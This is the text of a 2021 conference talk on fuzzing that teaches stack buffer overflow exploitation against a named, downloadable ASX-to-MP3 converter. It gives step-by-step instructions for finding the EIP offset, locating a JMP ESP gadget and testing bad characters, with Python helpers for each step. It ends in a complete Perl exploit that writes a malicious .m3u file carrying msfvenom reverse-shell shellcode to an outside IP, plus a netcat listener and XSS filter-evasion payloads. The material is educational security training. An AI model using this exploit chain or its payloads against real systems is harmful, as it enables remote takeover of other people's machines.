Fuzzing
Finding Your Own Bugs and 0days!
$Whoami
Rodolpho Concurde (ROd0X)
• Penetration Tester
• IT Instructor
• Information Security Consultant, 10 years
• EC-Council C|EH
• Author, Hakin9 Magazine: Stack Overflow; Pentest Magazine: Covert Channel,
From Fuzzing to Get a Shell and From SEH Overwrite to Get a Shell
Agenda
Fuzzing
● Types of targets;
● Types of attacks;
● Types of fuzzers;
● Buffer overflow;
● P0C!!
Types of targets
- Protocol: FTP, POP3, SMTP, Telnet, any of them!
- Application: any INPUT of any application.
- File format: any file format (.mp3, .m3u, .mp4, …), to test the software that reads it!
Types of Attacks
Fuzzers try combinations of attacks on:
- numbers
- chars
- metadata
- pure binary sequences
A list of dangerous strings is sent to the target, one after another.
Example: (-999999999, alert`1`, top["al"+"ert"](1),
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a, 11000001000010010001100).
Types of Fuzzers - Characteristics
● Dumb: any string combination, with no knowledge of the input format;
● Smart fuzzing: smart fuzzers are programmed with knowledge of the input format, i.e. a
protocol definition or rules for a file format.
- Mutation: take valid inputs and modify them
-- obtained through replay, MITM or a proxy
- Generation: build inputs from a model of the format or protocol
- Evolutionary: feedback from the target (e.g. code coverage) decides which cases are kept and mutated further
Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing
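As an added example (not code from the talk), here is the difference between the dumb and the mutation approach for the file-format target used later in the talk. The seed playlist and the dangerous-string list are constructed here; the reader command passed to run_case (e.g. wine plus the converter executable) is hypothetical and must be replaced with the real target. Because .m3u is line-based, the mutator keeps the line structure and only alters one line at a time, which is exactly the format knowledge a "smart" fuzzer has and a dumb one lacks.

```python
import random
import subprocess

# Constructed seed (not from the talk): a minimal, valid .m3u playlist of the
# kind the converter fuzzed later in the talk accepts as input.
SEED_M3U = (b"#EXTM3U\r\n"
            b"#EXTINF:123,Sample Artist - Sample Title\r\n"
            b"C:\\music\\sample.mp3\r\n")

# Dangerous strings in the spirit of the "Types of Attacks" list: numbers,
# characters, format strings, path traversal, markup and raw binary.
DANGEROUS = [
    b"-999999999", b"4294967296", b"%s%s%s%s%n", b"\x00", b"\xff" * 8,
    b"../../../../windows/win.ini", b"<svg/onload=alert(1)>",
]

def length_ladder(step=500, limit=50000):
    """The classic 'keep growing the string until it crashes' sizes."""
    return list(range(step, limit + 1, step))

def dumb_case(length):
    """Dumb fuzzing: no format knowledge, just a long run of one byte."""
    return b"A" * length

def mutate_m3u(seed, rng):
    """Mutation fuzzing with format knowledge: .m3u is line-based, so mutate
    one line at a time and keep the line structure of the seed intact."""
    lines = seed.split(b"\r\n")
    idx = rng.randrange(len(lines))
    kind = rng.choice(("overflow", "dangerous", "bitflip"))
    if kind == "overflow":
        # keep the start of the line so the parser still reaches the field
        lines[idx] = lines[idx][:8] + b"A" * rng.choice(length_ladder())
    elif kind == "dangerous":
        lines[idx] = lines[idx] + rng.choice(DANGEROUS)
    else:
        data = bytearray(lines[idx]) or bytearray(b" ")
        pos = rng.randrange(len(data))
        data[pos] ^= 1 << rng.randrange(8)
        lines[idx] = bytes(data)
    return b"\r\n".join(lines)

def generate_cases(seed, count, rng_seed=0):
    """Deterministic corpus: the same rng_seed reproduces the same cases,
    which matters when you need to replay the one that crashed."""
    rng = random.Random(rng_seed)
    return [mutate_m3u(seed, rng) for _ in range(count)]

def run_case(reader_cmd, case, path, timeout=5):
    """Write one case to disk, run the reader on it, classify the result.
    reader_cmd is hypothetical, e.g. ["wine", "ASX2MP3Converter.exe"].
    A negative return code on POSIX means death by signal (SIGSEGV etc.);
    on Windows an access violation surfaces as exit code 0xC0000005."""
    with open(path, "wb") as f:
        f.write(case)
    try:
        proc = subprocess.run(reader_cmd + [path], timeout=timeout,
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
    except subprocess.TimeoutExpired:
        return "hang"
    if proc.returncode < 0 or proc.returncode == 0xC0000005:
        return "crash"
    return "ok"

def fuzz(reader_cmd, seed=SEED_M3U, count=200, workdir="."):
    """Drive the loop; return the cases that crashed or hung so they can be
    minimised and then replaced by a pattern_create buffer."""
    findings = []
    for n, case in enumerate(generate_cases(seed, count)):
        result = run_case(reader_cmd, case, f"{workdir}/case{n}.m3u")
        if result != "ok":
            findings.append((n, result, case))
    return findings
```

A GUI converter will not exit on its own, so in practice the crash check is done by watching the process under a debugger, as the talk does with Immunity; the classification in run_case is for command-line readers. Keep the rng_seed and the case number of every finding: without them a crash that depends on the exact mutation cannot be reproduced.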
Buffer overflow
A buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the
buffer's boundary and overwrites adjacent memory locations.
It might be:
Heap based: the heap is the region of memory used for large amounts of data allocated
dynamically (malloc/new);
Stack based: the stack holds data of limited or fixed size, such as local variables, function
arguments and saved return addresses. Overwriting the saved return address is what hands
control of EIP to the attacker in the P0C that follows.
B.O. (Buffer Overflow) Code Example
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    // Reserve a 5-byte buffer. strcpy() appends a terminating NULL,
    // so an argument of 5 or more characters already writes past its end...
    char buffer[5]; // If the user supplies more than 5 characters,
                    // there will be an access violation /
                    // segmentation fault.
    // A prompt showing how to execute the program...
    if (argc < 2)
    {
        printf("strcpy() NOT executed....\n");
        printf("Syntax: %s <characters>\n", argv[0]);
        exit(0);
    }
    // ……………………... (the rest of the example, the strcpy() into buffer, is cut off on the slide)
    return 0;
}
P0C
Discover the INPUT format before fuzzing.
Example for the POP3 protocol - https://tools.ietf.org/rfc/rfc1081.txt
(RFC 1081 is the original POP3 specification; the current one is RFC 1939, but the USER/PASS commands fuzzed here are the same.)
P0C
Vulnerable software to download:
https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7-yahoopops-win-0.6.exe
P0C
Vulnerable software for file format fuzzing!
http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe
Open the software in Immunity Debugger:
File -> Attach -> ASX2MP3Converter, then run it with F9
P0C
The image below shows the code used to fuzz the vulnerable software.
It sends to the INPUT of the software the string held in the variable [$buffer].
The value of [$buffer] can be generated with the Metasploit tool pattern_create.
P0C
Run the script with the command [perl asx2mp3.pl].
Then load the file p0c.m3u into the vulnerable software while it runs under Immunity Debugger.
And we have a Stack Overflow: EIP now holds 4 bytes of our pattern!
P0C
The next step is to use pattern_offset to locate the offset of EIP in the pattern (the value read from the debugger is a little-endian dword of the pattern).
Note that the Metasploit pattern repeats after 20280 bytes, so with a 50000-byte buffer pattern_offset reports more than one match; the offset used in the exploit below is 35056.
P0C
In the debugger we use mona.py to see the modules loaded by the vulnerable software. We need an
address that makes a JUMP from EIP to ESP, because ESP is where we put our shellcode.
Let's search for a module that contains a JMP ESP; first, let's list the modules.
For this we use the mona.py script:
https://raw.githubusercontent.com/corelan/mona/master/mona.py
Download mona.py and paste it at:
C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands
Now let's use mona! Type in the Immunity command bar: !mona modules
We should pick a module without protection mechanisms (Rebase, SafeSEH, ASLR and NXCompat all
False in the table), so that the address we choose is the same on every run.
P0C
The next step is to find, inside the msvos module, an instruction that jumps to the ESP register;
for this we first need the opcode bytes of JMP ESP (FF E4, which !mona assemble -s "jmp esp" prints).
Then we use the mona find command to search the module for those bytes
(!mona find -s "\xff\xe4" -m <module>; !mona jmp -r esp -m <module> does the same and also reports equivalents such as CALL ESP and PUSH ESP / RET).
P0C
This command finds the address 0x01ba135b, which we insert into the exploit code below, written
little-endian as "\x5b\x13\xba\x01". The address itself must not contain any of the bad characters found next.
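The three steps above (build the pattern, find the EIP offset, find a JMP ESP and pack the address) as an added example, not the talk's or mona's code. It reimplements the Metasploit pattern scheme, so the repeating-pattern caveat can be seen directly, and scans a module image for JMP ESP and its equivalents while rejecting addresses that contain a bad character. The module bytes and image base in the test are constructed: a JMP ESP is placed at offset 0x135b of a fake module based at 0x01ba0000 so that the result mirrors the talk's address; in real use the bytes come from the module mapped in the debugger.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# Aa0 Aa1 ... Zz9 is 26*26*10 triples of 3 bytes: after 20280 bytes the
# pattern starts over, which is why a 50000-byte pattern yields two matches.
PERIOD = len(UPPER) * len(LOWER) * len(DIGITS) * 3

def pattern_create(length):
    """Same scheme as Metasploit's pattern_create: Aa0Aa1Aa2 ... Zz9, repeated."""
    out = bytearray()
    while len(out) < length:
        for u in UPPER:
            for l in LOWER:
                for d in DIGITS:
                    out += (u + l + d).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])

def pattern_offsets(pattern, eip):
    """EIP as displayed by the debugger is a little-endian dword, so the bytes
    that overwrote the return address are struct.pack('<I', eip). Return every
    offset where they occur; more than one means the pattern was longer than
    PERIOD and the true offset has to be confirmed with a second run."""
    needle = struct.pack("<I", eip)
    offsets, start = [], 0
    while (i := pattern.find(needle, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets

# Opcode sequences that transfer control to the address in ESP.
JMP_ESP_EQUIVALENTS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}

def find_jmp_esp(module_bytes, image_base, badchars=b"\x00\x0a"):
    """Scan a module image for JMP ESP equivalents and drop every address
    whose little-endian bytes contain a bad character: such an address would
    be truncated or mangled before it ever reached the saved return address."""
    hits = []
    for opcodes, mnemonic in JMP_ESP_EQUIVALENTS.items():
        start = 0
        while (i := module_bytes.find(opcodes, start)) != -1:
            addr = image_base + i
            if not any(b in badchars for b in struct.pack("<I", addr)):
                hits.append((addr, mnemonic))
            start = i + 1
    return sorted(hits)

def eip_bytes(addr):
    """The address as it must be written into the buffer (little-endian)."""
    return struct.pack("<I", addr)
```

mona does all of this inside the debugger (!mona pattern_create, !mona pattern_offset, !mona jmp -r esp -cpb "\x00\x0a"); the value of the stand-alone version is seeing why pattern_offset can return two offsets for a 50000-byte buffer and why an address such as 0x01ba0a00 is unusable when 0x0a is bad.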
Now we need to search for bad characters. Depending on the application, the type of
vulnerability and the protocols in use, certain characters may be considered "bad"
and must not be used in the buffer or the shellcode.
One example of a bad character is 0x00.
This character is bad because a null byte terminates a string copy operation,
which would truncate our buffer wherever the null byte appears.
To test whether the software has more bad characters, close the software and Immunity, then
reopen Immunity and attach the software again.
P0C
We will send the string below from inside our exploit code (0x00 is already left out).
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
P0C
Sending the bad characters against the target!
P0C
In Immunity, right-click on ESP and choose Follow in Dump.
P0C
Dump of memory with the bad characters.
P0C
We won't send the characters 0x00 and 0x0a, because we already know they are bad characters
and, for that reason, cause errors in the software (0x0a is a line feed, and .m3u is a line-based
format, so the reader ends the entry there).
Our exploit code looks like the image below! We add the variable badchars.
P0C
Dump of memory without the bad character \x0a.
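The bad-character loop as an added example (not the talk's code): build the byte string without the characters already known to be bad, compare it position by position with what the dump at ESP shows, and add the first byte that did not survive, repeating until the whole string arrives intact. The target here is a constructed stand-in that behaves like the line-based reader in the talk (it cuts the input at the first 0x0a) and additionally rewrites 0x0d, to show that a bad character can be either truncation or transformation; the real comparison is done against the bytes read from the debugger.

```python
def badchar_string(exclude=(0x00,)):
    """All byte values 0x00..0xff minus the ones already known to be bad,
    in order, so the dump can be compared position by position."""
    return bytes(b for b in range(256) if b not in exclude)

def compare_dump(sent, dumped):
    """Compare the bytes we sent with what the debugger shows at ESP
    (Follow in Dump). Return the first sent byte that does not survive,
    or None if all of them match. A byte is lost either because it
    truncated the buffer or because the target rewrote it."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None

def find_badchars(sender, known=(0x00,)):
    """Iterate the way the talk does: send, inspect, add the culprit, repeat,
    until the whole string survives. `sender` takes the string and returns
    the bytes observed in memory; one run per bad character is needed
    because a truncating byte hides everything that follows it."""
    known = list(known)
    while True:
        sent = badchar_string(known)
        culprit = compare_dump(sent, sender(sent))
        if culprit is None:
            return bytes(known)
        known.append(culprit)

# Constructed stand-in for the target (not the real converter): a line-based
# reader that cuts the input at the first 0x0a and also replaces 0x0d with 0x20.
def fake_target(data):
    data = data.split(b"\x0a", 1)[0]
    return data.replace(b"\x0d", b"\x20")
```

Inside Immunity, mona automates the same comparison: !mona bytearray -cpb "\x00\x0a" writes the array to disk and !mona compare -f bytearray.bin -a <address of ESP> reports which bytes were corrupted. Every byte found this way also goes into the -b list of msfvenom, otherwise the encoder will happily emit it.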
Setting a breakpoint on the JMP ESP address with a double-click, we see the execution flow stop
at the chosen address.
Finally, let's generate our shellcode with the msfvenom tool and put it into the exploit code.
P0C
Load the new malicious file into ASX2MP3.
P0C
nc -lvvp 5555 -> listen on TCP port 5555 (the LPORT given to msfvenom)
And we got a shell :)
Exploit Code
#!/usr/bin/perl
use strict;
use warnings;

my $buffsize = 50000;
my $junk = "\x41" x 35056;        # padding up to the saved return address (offset from pattern_offset)
my $eip  = "\x5b\x13\xba\x01";    # 0x01ba135b = JMP ESP, written little-endian
my $nops = "\x90" x 10;           # small NOP sled in front of the shellcode
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl
#   -e x86/shikata_ga_nai -b "\x0a\x00"
my $shell = "\xda\xc2\xf2\xe7\x42\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9" .
"\xb1\x52\x31\x70\x12\x83\xc0\x04\x03\xb2\xfc\x05\xb7\xce" .
# …. shellcode (the middle of the msfvenom output is cut off on the slide) ….
"\x38\xa2\x9e\xb7\x3d\xee\x18\x24\x4c\x7f\xcd\x4a\xe3\x80" .
"\xba";
my $sploit = $junk.$eip.$nops.$shell;
my $fill = "\x43" x ($buffsize - (length($sploit)));   # pad to the size that crashed during fuzzing
my $buffer = $sploit.$fill;
# write the exploit buffer to file
my $file = "p0c.m3u";
open (FILE, ">$file") or die "cannot open $file: $!";
binmode(FILE);
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: ". length($buffer) . "\n";
Questions??
Thanks!
Rodolpho Concurde
rconcurde@gmail.com
https://www.linkedin.com/in/rodolphoconcurde

stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
